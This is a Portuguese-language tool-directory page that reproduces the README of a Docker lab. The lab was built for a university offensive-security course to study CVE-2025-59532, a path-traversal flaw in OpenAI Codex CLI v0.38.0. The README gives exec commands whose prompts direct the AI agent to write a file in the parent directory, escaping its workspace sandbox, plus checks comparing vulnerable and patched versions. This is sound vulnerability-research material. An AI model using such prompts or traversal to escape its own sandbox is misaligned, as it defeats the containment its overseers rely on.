Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2025-59532-poc — Um ambiente de pesquisa baseado em Docker para analisar CVE-2025-59532, uma vulnerabilidade de path traversal no OpenAI Codex CLI que permite gravação arbitrária de arquivos fora do sandbox do espaço de trabalho pretendido. Parte do Curso CMU: 18-739 Hacking & Offensive Security no outono de 2025 | Kitploit
Ferramentas/GitHubGitHub/baktistr/cve-2025-59532-poc
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Um ambiente de pesquisa baseado em Docker para analisar CVE-2025-59532, uma vulnerabilidade de path traversal no OpenAI Codex CLI que permite gravação arbitrária de arquivos fora do sandbox do espaço de trabalho pretendido. Parte do Curso CMU: 18-739 Hacking & Offensive Security no outono de 2025

GitHub
baktistr/cve-2025-59532-poc

cve-2025-59532-poc

Ver Repositório
13há 8 mesesAinda não revisado
Compartilhar

Ambiente Docker CVE-2025-59532

Um ambiente de pesquisa baseado em Docker para analisar a CVE-2025-59532, uma vulnerabilidade de path traversal no OpenAI Codex CLI que permite escrita arbitrária de arquivos fora da sandbox da área de trabalho pretendida. Parte do Curso da CMU: 18-739 Hacking & Segurança Ofensiva no Outono de 2025

Começando

Clone o Repositório

Primeiro, clone este repositório:

root@kitploit:~
git clone https://github.com/jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

Ou se estiver usando SSH:

root@kitploit:~
git clone [email protected]:jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

Descrição da CVE

CVE-2025-59532 é uma vulnerabilidade de path traversal na ferramenta Codex CLI da OpenAI que permite que atacantes escrevam arquivos fora do diretório de trabalho pretendido, contornando as restrições da sandbox.

Detalhes da Vulnerabilidade

  • ID CVE: CVE-2025-59532
  • Versão Afetada: Codex CLI v0.38.0 e anteriores
  • Tipo de Vulnerabilidade: Escrita Arbitrária de Arquivos / Path Traversal
  • Severidade: Alta
  • Vetor de Ataque: Um atacante pode criar prompts que fazem com que o Codex escreva arquivos em diretórios pai (por exemplo, ../exploit.txt), escapando da sandbox mesmo quando --sandbox workspace-write está ativado.
  • Impacto: Criação não autorizada de arquivos em diretórios do sistema, potencial para escalonamento de privilégios e comprometimento dos limites de segurança do contêiner.
  • Correção: Corrigido na v0.39.0 com validação e sanitização de caminho melhoradas

Como Funciona

A vulnerabilidade explora a validação insuficiente de caminho na implementação da sandbox da área de trabalho. Quando o modo de sandbox workspace-write está ativado, o Codex deve restringir as operações de arquivo ao diretório de trabalho designado. No entanto, na v0.38.0, a validação de caminho não consegue lidar adequadamente com sequências de path traversal relativas (../), permitindo que um atacante escreva arquivos fora da sandbox ao instruir a IA a usar referências de diretório pai.

Pré-requisitos

  • Docker instalado no seu sistema
  • Chave de API da OpenAI (obtenha uma em https://platform.openai.com/api-keys)
  • Conhecimento básico de Docker e operações de linha de comando
  • Git (para clonar o repositório)

Construir e Executar

Construir a imagem Docker:

root@kitploit:~
docker build -t cve-2025-59532:latest .

Executar o contêiner:

root@kitploit:~
docker run -it --rm cve-2025-59532:latest

Uso

Este ambiente Docker inclui três versões do Codex CLI:

  • codex38 - v0.38.0 (versão vulnerável)
  • codex39 - v0.39.0 (versão corrigida)
  • codex50 - v0.50.0 (versão mais recente)

Configurar a Chave de API da OpenAI

Dentro do contêiner, configure sua chave de API da OpenAI simplesmente executando o codex em modo interativo e colando a chave de API lá:

root@kitploit:~
codex

A chave de API será armazenada em ~/.config/codex/auth.json e será usada por todas as versões do Codex (codex38, codex39, codex50).

Verificar Versões

root@kitploit:~
codex38 --version  # Should show v0.38.0 (vulnerable)
codex39 --version  # Should show v0.39.0 (patched)
codex50 --version  # Should show v0.50.0 (latest)

Testando a Vulnerabilidade

Nota: A área de trabalho está localizada em /workspace/child. A vulnerabilidade permite escrever em /workspace (o diretório pai).

Testar versão vulnerável (v0.38.0):

root@kitploit:~
codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof1.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Testar versão corrigida (v0.39.0):

root@kitploit:~
codex39 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof2.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Testar versão mais recente (v0.50.0):

root@kitploit:~
codex50 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof3.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Verificar o exploit:

root@kitploit:~
# Check if files were created outside the sandbox (in /workspace, not /workspace/child)
ls -la /workspace/
cat /workspace/exploit_proof1.txt  # Should exist if v0.38.0 is vulnerable
cat /workspace/exploit_proof2.txt  # Should NOT exist if v0.39.0 is patched
cat /workspace/exploit_proof3.txt  # Should NOT exist if v0.50.0 is secure

# Check current workspace (should be empty or contain only test files)
pwd  # Should show /workspace/child
ls -la /workspace/child/

Verificar Logs

Para ver logs de depuração detalhados da execução do Codex:

root@kitploit:~
RUST_LOG=debug codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Os logs de depuração mostrarão:

  • Requisições e respostas da API
  • Tentativas de validação de caminho
  • Detalhes das operações de arquivo
  • Comportamento de aplicação (ou bypass) da sandbox
Baixar ferramenta